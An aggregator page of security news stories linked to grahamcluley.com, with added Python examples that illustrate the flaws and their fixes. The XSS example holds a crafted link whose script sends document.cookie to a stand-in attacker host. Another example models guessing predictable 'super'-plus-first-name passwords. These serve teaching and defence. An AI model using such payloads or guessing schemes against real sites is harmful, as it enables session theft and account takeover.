Domain: grahamcluley.com
Stories and comments across the archive that link to grahamcluley.com.
Stories · 16
SuperProf Private Tutor Site Fails Password Test, Makes Accounts Super Easy To Hack (grahamcluley.com)
Superprof, which claims to be "the world's largest tutoring network," has made its newest members' passwords utterly predictable... leaving them wide open to hackers. From a report: SuperProf is a website that helps you find a private tutor -- either online via webcam, or face-to-face. The site claims to have over three million tutors on its books, helping people learn languages, how to play musical instruments, or giving kids extra lessons in tricky subjects. It's not the only site which offers these kinds of services. For instance, SuperProf has just taken over UK-based The Tutor Pages, and -- to the surprise of many Tutor Pages teachers -- migrated them to SuperProf. And, sadly, that account migration has been utterly incompetent from the security point of view.
In an email that SuperProf sent Tutor Pages teachers last night, it shared details of how they can log in to their new SuperProf account. If a tutor's name is Barbara, her new SuperProf-provided password is "superbarbara". Clarinetist Lisa's new SuperProf-supplied password is "superlisa." -
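Added example, not code from the story or from SuperProf: it models the "super" + first name scheme against a first-name wordlist to show how few guesses an attacker who knows the pattern needs, then contrasts it with a per-user temporary password drawn from the OS CSPRNG and a policy check that rejects any password embedding a profile value. The name list, the SHA-256 stand-in for the stored verifier and the profile fields are all constructed for the illustration.

```python
import hashlib
import math
import secrets
import string
from typing import Iterable, Optional

# Constructed first-name list standing in for the public name lists an attacker
# would use; the story's own examples (Barbara, Lisa) are included.
COMMON_FIRST_NAMES = ["james", "mary", "john", "lisa", "barbara", "susan", "david"]


def weak_migration_password(first_name: str) -> str:
    """The scheme the story describes: a fixed prefix plus the tutor's first name."""
    return "super" + first_name.lower()


def store_hash(password: str) -> str:
    """Stand-in for the server's stored verifier. A real site should use a slow
    hash such as bcrypt or argon2; the point here is guess count, not hash speed."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def guesses_to_recover(stored: str, name_list: Iterable[str]) -> Optional[int]:
    """Guesses an attacker who knows the scheme needs to hit the stored hash;
    None if the name list does not contain the right first name."""
    for count, name in enumerate(name_list, start=1):
        if store_hash(weak_migration_password(name)) == stored:
            return count
    return None


def random_keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a uniformly random password: log2(alphabet_size ** length)."""
    return length * math.log2(alphabet_size)


def secure_temp_password(length: int = 16) -> str:
    """Unpredictable per-user temporary password; should be forced to change on first login."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def derived_from_profile(password: str, profile_values: Iterable[str]) -> bool:
    """Policy check: reject passwords that embed a profile value (name, e-mail local part, ...)."""
    lowered = password.lower()
    return any(len(v) >= 3 and v.lower() in lowered for v in profile_values)
```

With the scheme known, "superbarbara" falls on the fifth guess of a seven-name list; a 16-character alphanumeric token from `secrets` sits at roughly 95 bits, beyond any wordlist.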
'Text Bomb' Is Latest Apple Bug (bbc.com)
An anonymous reader quotes a report from the BBC: A new "text bomb" affecting Apple's iPhone and Mac computers has been discovered. Abraham Masri, a software developer, tweeted about the flaw which typically causes an iPhone to crash and in some cases restart. Simply sending a message containing a link which pointed to Mr Masri's code on programming site GitHub would be enough to activate the bug -- even if the recipient did not click the link itself. Mr Masri said he "always reports bugs" before releasing them. Apple has not yet commented on the issue. On a Mac, the bug reportedly makes the Safari browser crash, and causes other slowdowns. Security expert Graham Cluley wrote on his blog that the bug does not present anything to be particularly worried about -- it's merely very annoying. After the link did the rounds on social media, Mr Masri removed the code from GitHub, therefore disabling the "attack" unless someone was to replicate the code elsewhere. -
It Took a Massachusetts Hospital 14 Years To Detect a Data Breach (grahamcluley.com)
An anonymous reader shares a report: To make matters worse, even after all that time -- it wasn't the medical center itself that discovered the incident. Tewksbury Hospital learned of the breach in the spring of 2017. It hasn't found any evidence to suggest the security incident resulted in attackers misusing patients' data. Even so, it believes the event compromised the security of affected individuals' personal and medical information. As the state-run institution explains in a statement: "In April of this year, a former patient expressed concern that someone may have accessed their electronic medical record inappropriately. A review conducted in response to this complaint revealed that one hospital employee appeared to have accessed the former patient's records without a good reason to do so. This discovery led to a broader review of the employee's use of the electronic medical records system at Tewksbury Hospital. As a result of this review, we were able to determine that the employee appeared to have inappropriately accessed the records of a number of current and former Tewksbury Hospital patients." -
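Added example, not code from the story or from Tewksbury Hospital: it runs the review the statement describes over a constructed EHR audit log (first "who opened this patient's chart", then "what else did that user open"), and adds the two proactive checks that would have surfaced the pattern without waiting for a complaint: accesses with no care-team relationship, and users touching more distinct charts than their role warrants. The log lines, user names, patient IDs and care-team table are all made up for the illustration.

```python
from collections import defaultdict
from datetime import datetime

# Constructed EHR audit log (not real hospital data): timestamp user patient action
SAMPLE_LOG = """\
2017-04-03T09:12:00 nurse01 P-1001 view
2017-04-03T09:15:10 nurse01 P-1002 view
2017-04-03T11:40:22 clerk07 P-1001 view
2017-04-03T11:41:05 clerk07 P-2230 view
2017-04-03T11:42:30 clerk07 P-3311 view
2017-04-04T08:05:00 dr_lee P-1001 view
2017-04-04T08:20:45 dr_lee P-1002 view
"""

# Constructed care-team assignments: who has a clinical reason to open which chart
CARE_TEAM = {
    ("nurse01", "P-1001"), ("nurse01", "P-1002"),
    ("dr_lee", "P-1001"),
}


def parse_log(text):
    """Yield (timestamp, user, patient, action) tuples from the whitespace-separated log."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, patient, action = line.split()
        yield datetime.fromisoformat(ts), user, patient, action


def who_accessed(text, patient):
    """Step 1 in the story: a patient asks who opened their record."""
    return {user for _, user, p, _ in parse_log(text) if p == patient}


def accesses_by_user(text, user):
    """Step 2: widen the review to everything that one user opened, in log order."""
    return [(ts, patient) for ts, u, patient, _ in parse_log(text) if u == user]


def accesses_without_relationship(text, care_team):
    """Proactive check: every access lacking a care-team relationship, for human review."""
    return [(ts, user, patient)
            for ts, user, patient, _ in parse_log(text)
            if (user, patient) not in care_team]


def users_over_threshold(text, max_distinct_patients):
    """Volume heuristic: users who opened more distinct charts than their role should."""
    seen = defaultdict(set)
    for _, user, patient, _ in parse_log(text):
        seen[user].add(patient)
    return {u: len(p) for u, p in seen.items() if len(p) > max_distinct_patients}
```

On the sample log the relationship check flags all three of clerk07's accesses and one stray access by dr_lee; the volume heuristic singles out clerk07 alone, which is why the two checks are worth running together: one catches the browsing pattern, the other the one-off that a care-team table alone would also surface.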
Yahoo Patents Smart Billboard That Would Deliver Targeted Ads To Passersby or Motorists (thestack.com)
An anonymous reader writes: Yahoo has filed a patent for advertising billboards outfitted with a wide array of sensors -- including drone-based cameras -- which would use facial and vehicle recognition, data brokers, cell-tower information and social network information to attempt to identify worthwhile advertising targets and aim personalized ads at them as they pass on foot or in cars. The scheme, which was submitted on October 6th, anticipates using the same kind of micro-auction processes that currently determine which ads users see in webpages and mobile apps. The implementation of public ad-targeting brings up some fascinating and chilling prospects, as users find that the ads which "bloom" around them betray much about their private lives. Yahoo provides an example via its patent application: "According to one example, a digital billboard adjacent a busy freeway might be instrumented with or located near traffic sensors that detect information about the context of the vehicles approaching the billboard, e.g., the number and average speed of the vehicles. Such information might be used in conjunction with information about the time of day and/or the day of the week (e.g., Monday morning rush hour) to select advertisements for display that would appeal to an expected demographic and to display the advertisements for durations that are commensurate with the level of traffic congestion." The patent application also mentions how it will gather required information from individuals: "Various types of data (e.g., cell tower data, mobile app location data, image data, etc.) can be used to identify specific individuals in an audience in position to view advertising content. Similarly, vehicle navigation/tracking data from vehicles equipped with such systems could be used to identify specific vehicles and/or vehicle owners. Demographic data (e.g., as obtained from a marketing or user database) for the audience can thus be determined for the purpose of, for example, determining whether and/or the degree to which the demographic profile of the audience corresponds to a target demographic." -
Hackers Seed Torrent Trackers With Malware Disguised as Popular Downloads (grahamcluley.com)
An anonymous reader writes: Cybercriminals are spreading malware via torrent distribution networks, using an automated tool to disguise the downloads as trending audio, video and other digital content in an attempt to infect more unsuspecting victims. Researchers at InfoArmor say they have uncovered a malicious torrent distribution network that relies on a tool called RAUM to infect computers with malware. The network begins with a torrent parser, which collects information about some of the most popular torrent files circulating around the web. Computer criminals then apply their RAUM tool to create a series of malicious files. Some are fake copies of those popular torrent files that in reality hide notorious malware such as CryptXXX, Cerber, or Dridex. Others are weaponized torrent files, while others still are parsed torrent files that rely on a high download rating, a reputation which the attackers artificially inflate by abusing compromised users' accounts to set up new seeds. -
LastPass Accounts Can Be 'Completely Compromised' When Users Visit Sites (theregister.co.uk)
Reader mask.of.sanity writes: A dangerous zero-day vulnerability has been found in popular cloud password vault LastPass, which can completely compromise user accounts when users visit malicious websites. The flaw is today being reported to LastPass by established Google Project Zero hacker Tavis Ormandy who says he has found other "obvious critical problems". Interestingly, Mathias Karlsson, a security researcher, has also independently found flaws in LastPass. In a blog post, he wrote that he was able to trick LastPass into believing he was on the real Twitter website and cough up the user's credentials because of a bug in the LastPass password manager's autofill functionality. LastPass has fixed the bug, but Karlsson advises users to disable autofill functionality and use multi-factor authentication. At this point, it's not clear whether Ormandy is also talking about the same vulnerability. -
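Added example, not LastPass's code and not a reconstruction of Karlsson's bug: it shows the general failure mode behind "tricking the manager into believing it was on the real site", a site matcher that looks for the domain name in the URL string, next to the check an autofill decision should make, parsing the page URL and comparing scheme, host and port exactly. The vault origin, the attacker URLs and the `autofill_decision` helper are constructed for the illustration.

```python
from urllib.parse import urlsplit

# Constructed vault entry: the origin the saved credential belongs to
VAULT_ORIGIN = "https://twitter.com"

# Constructed attacker-controlled URLs; every one contains the string "twitter.com"
ATTACKER_URLS = [
    "https://attacker.example/twitter.com/login",   # domain name in the path
    "https://twitter.com.attacker.example/",        # domain name as a subdomain label
    "https://twitter.com@attacker.example/",        # domain name as userinfo
    "http://twitter.com/",                          # right host, plaintext HTTP
]


def naive_site_match(page_url: str, vault_domain: str) -> bool:
    """Deliberately weak matcher: the site is 'recognised' if its name appears
    anywhere in the URL text. Every entry in ATTACKER_URLS passes this test."""
    return vault_domain in page_url


def strict_origin_match(page_url: str, vault_origin: str) -> bool:
    """Parse both URLs and require identical scheme, host and port, i.e. the
    browser's notion of origin. Only https pages are eligible for autofill."""
    page, vault = urlsplit(page_url), urlsplit(vault_origin)
    if page.scheme != "https" or vault.scheme != "https":
        return False
    # .hostname drops userinfo and the port and lowercases the host
    page_host, vault_host = page.hostname, vault.hostname
    if not page_host or not vault_host:
        return False
    return page_host == vault_host and (page.port or 443) == (vault.port or 443)


def autofill_decision(page_url: str, vault_origin: str = VAULT_ORIGIN) -> dict:
    """Both verdicts side by side for one page URL."""
    domain = urlsplit(vault_origin).hostname
    return {"naive": naive_site_match(page_url, domain),
            "strict": strict_origin_match(page_url, vault_origin)}
```

The userinfo case is the one to remember: `https://twitter.com@attacker.example/` is a perfectly valid URL whose host is `attacker.example`, so any matcher that has not actually parsed the URL will get it wrong.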
Online Backup Firm Carbonite Tells Users To Change Their Passwords Now (grahamcluley.com)
Security reporter Graham Cluley writes: Online backup company Carbonite is the latest firm to have issued a warning that hackers are attempting to break into its users' accounts, and is prompting all users to change their passwords as a result. An email has been sent to Carbonite users explaining that the attackers are thought to be using passwords gleaned from other recent mega-breaches. "Based on our security reviews, there is no evidence to suggest that Carbonite has been hacked or compromised," the email reads. "To ensure the protection of all our customers and the safety of their data, we are requiring all Carbonite customers to reset their login information." Instructions to assist you with changing your password are here. -
Telegram Bug Allows Attackers To Crash Devices, Jack Up Phone Bills (grahamcluley.com)
An anonymous reader writes: Researchers have uncovered a vulnerability in Telegram, a popular instant messaging client with over 100M monthly active users, that attackers could exploit to crash unsuspecting users' devices and jack up their mobile phone bills. To prevent malicious users from abusing the app, Telegram limits text messages to a specific range of characters -- each message must consist of at least one character, and it may not exceed 4,096 characters. But according to Iranian security researchers Sadegh Ahmadzadegan and Omid Ghaffarinia, those limitations can easily be circumvented. The two researchers note in a blog post that a programming error allows a sender to successfully transmit a message with arbitrary length to a receiver. That large file can, in turn, cause the phone to crash or stop working due to a lack of memory. It can also eat up a user's monthly data allotment if they are connected to their mobile network and not Wi-Fi. Telegram has yet to acknowledge the vulnerability, let alone provide a fix for it. -
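Added example, not Telegram's code and not the researchers' proof of concept: a limit that only the sending client enforces is no limit at all, so this sketches the check a relay has to make itself before forwarding anything to a recipient. It caps the raw payload in bytes before decoding (so an oversized message is refused without allocating for it), then applies the 1 to 4,096 character rule on Unicode code points. The `MessageRejected` type, the `relay` helper and the byte cap are assumptions for the illustration; the receiving client should apply the same bound as a second line of defence.

```python
MAX_CHARS = 4096            # the documented per-message limit
MAX_BYTES = MAX_CHARS * 4   # assumed cap: worst-case UTF-8 width of MAX_CHARS code points


class MessageRejected(ValueError):
    """Raised for any payload the relay refuses to forward."""


def validate_incoming(raw: bytes) -> str:
    """Server-side enforcement of the length rule, cheapest check first."""
    if len(raw) > MAX_BYTES:
        # Refuse before decoding: never let payload size drive memory use
        raise MessageRejected(f"payload of {len(raw)} bytes exceeds {MAX_BYTES}")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise MessageRejected("payload is not valid UTF-8") from exc
    length = len(text)  # code points, matching what the client counts
    if length < 1 or length > MAX_CHARS:
        raise MessageRejected(f"{length} characters outside 1..{MAX_CHARS}")
    return text


def relay(raw: bytes, deliver) -> tuple:
    """Forward a validated message to the recipient-side callable, or report why not."""
    try:
        text = validate_incoming(raw)
    except MessageRejected as exc:
        return ("rejected", str(exc))
    deliver(text)
    return ("delivered", len(text))
```

Counting code points rather than bytes keeps a 4,096-character message of non-ASCII text acceptable while still bounding the bytes the recipient has to download, which is the cost the story is describing.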
Ashley Madison Blackmail Letter Revealed (grahamcluley.com)
An anonymous reader writes: Security researcher Graham Cluley says he has been forwarded a blackmail letter, sent to a member of the controversial Ashley Madison adultery website. In the letter the blackmailer says that unless $2,000 worth of bitcoin is paid within 10 days, the recipient's wife, friends and colleagues will be informed of his misdemeanors. In a threatening twist, the letter goes on to give personal details of another victim who refused to pay the blackmailers, and how his personal life and work were targeted as a result. Cluley's advice to recipients is not to pay the blackmailers, but to tell the U.S. Postal Inspection Service. -
Hackers Publish Cheating Site's Stolen Data
pdclarry notes that many news outlets are reporting that 9.7 GB of data stolen from cheating website AshleyMadison.com has been published online. "The dump contains files with titles including 'aminno_member_dump.gz,' 'aminno_member_email.dump.gz,' 'CreditCardTransactions7z,' and 'member_details.dump.gz,' an indication that the download could contain highly personal details." Brian Krebs questioned the way this has been reported without confirmation, but added that he's been contacted by several people who found their own accurate details within the data dump. Many of the reports note this detail: "Assuming the download turns out to be authentic, people should remember that it was possible for anyone to create an account using the name and e-mail address of other individuals." -
BMW Patches Security Flaw Affecting Over 2 Million Vehicles
An anonymous reader writes: BMW has fixed a security bug which left 2.2 million cars, including models from Rolls Royce and Mini, exposed to hackers. The flaw was discovered in vehicles using BMW's ConnectedDrive software, which runs from an installed on-board SIM card. Via the smartphone app, owners can remotely control a number of functions including door locks, air conditioning and sounding the horn. Researchers from the German motorist association ADAC identified the flaw which allowed the system to connect to fake mobile phone networks, enabling hackers to remotely control the SIM card. -
Dropbox and Box Leaked Shared Private Files Through Google
judgecorp writes: "People using shared storage providers such as Box and Dropbox are leaking data, a competitor has discovered. Links to shared files leak out when those links are accidentally put into the Google search box, or if users click links from within the documents. Dropbox competitor Intralinks stumbled across mortgage applications and bank statements while checking Google Analytics data for a Google Adwords campaign. Graham Cluley explains the problem in detail and suggests answers: for Dropbox users, it means upgrading to the Business version, which lets you restrict access to shared document links." Dropbox has posted an official response and disabled access to previously shared links. Box made a vague statement about their awareness of the issue. -
Facebook Being Sued Over Mining of Private Messages
Kimomaru writes "Two Facebook users are trying to start a class action lawsuit against Facebook for allegedly mining information from private messages with the intention of selling it to advertisers (full complaint PDF). It's not the first time a social media player has been in the press over privacy or security issues. But when the services are provided free of charge, does the user have a realistic expectation of privacy or security, especially when it's understood that the user's data is being mined for advertising? If not, should social media networks be allowed to use words like 'private' (as in private messaging) or 'security' to describe their services?" -
Want To Hijack a Domain? Just Get a Fax Machine
msm1267 writes "Metasploit's HD Moore says hackers sent a spoofed DNS change request via fax to Register.com that the registrar accepted, leading to a DNS hijacking attack against the Metasploit and Rapid7 websites. The two respective homepages were defaced with a message left by the same hacker collective that claimed responsibility for a similar DNS attack against Network Solutions. Rapid7 said the two sites' DNS records have been locked down and they are investigating." -
Security Researchers Rewarded With $12.50 Voucher To Buy Yahoo T-Shirt
Hugh Pickens DOT Com writes "More and more companies are offering Bug Bounty Programs remunerating security researchers for reporting vulnerabilities and weaknesses in their applications and software. Now security analyst Graham Cluley writes that researchers at High-Tech Bridge informed Yahoo's Security Team about three cross-site scripting (XSS) vulnerabilities affecting the ecom.yahoo.com and adserver.yahoo.com domains. According to High-Tech Bridge, each of the vulnerabilities could compromise *any* @yahoo.com email account. All that was required was that the victim, while logged into Yahoo, should click on a specially-crafted link received in an email. Forty-eight hours later, Yahoo had patched all of the vulnerabilities and Yahoo's security team responded, thanking the researchers and 'offering the mighty bounty of err.. $12.50 per vulnerability,' writes Cluley. But there was one catch. The $12.50 was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo's corporate t-shirts, cups, pens and other accessories." -
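Added example, not Yahoo's code and not High-Tech Bridge's reports: it shows the bug class the story describes, a reflected cross-site scripting flaw where one click on a crafted link by a logged-in victim runs attacker script in the site's origin, beside the escaped rendering that neutralises it. The placeholder host `shop.example`, the `?q=` parameter, the crafted link and the crude `executes_script` stand-in for a browser are all constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed crafted link against a placeholder host (not a real Yahoo URL). Decoded,
# the q parameter is:  <script>new Image().src="https://attacker.example/?c="+document.cookie</script>
CRAFTED_LINK = ("https://shop.example/search?q=%3Cscript%3Enew%20Image().src%3D%22"
                "https%3A%2F%2Fattacker.example%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E")


def render_search_vulnerable(query: str) -> str:
    """Reflects the request parameter into the page unescaped: the flaw in the story."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Same page with the parameter HTML-escaped for an element-body context."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def serve(url: str, renderer) -> str:
    """Pull ?q= out of the link the victim clicked and render the response body."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return renderer(params.get("q", [""])[0])


def executes_script(markup: str) -> bool:
    """Crude stand-in for a browser: does an unescaped script tag survive in the body?"""
    return "<script" in markup.lower()
```

Escaping is context-specific: `html.escape` is right for text between tags and, with `quote=True`, for quoted attribute values, but a parameter reflected inside a `<script>` block or a URL attribute needs encoding for that context instead.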
VOIP Provider Viber Attacked By Syrian Electronic Army
An anonymous reader writes "The hacking group known as the Syrian Electronic Army have hacked into Viber, defacing its support website, and posting what they claim is evidence of surveillance by the free phone-messaging app. The Syrian Electronic Army posted a message claiming the 'Israeli-based Viber is spying and tracking you' alongside what appeared to be a screenshot of an internal Viber database containing users' phone numbers, device UDIDs, IP addresses, operating system, and Viber version information." Viber is saying the attack was minor: "...the hack only allowed access to two minor systems, a customer support panel and a support administration system. According to the company's official response, 'no sensitive user data was exposed and Viber's databases were not "hacked."' Apparently, an employee simply fell victim to a phishing attack.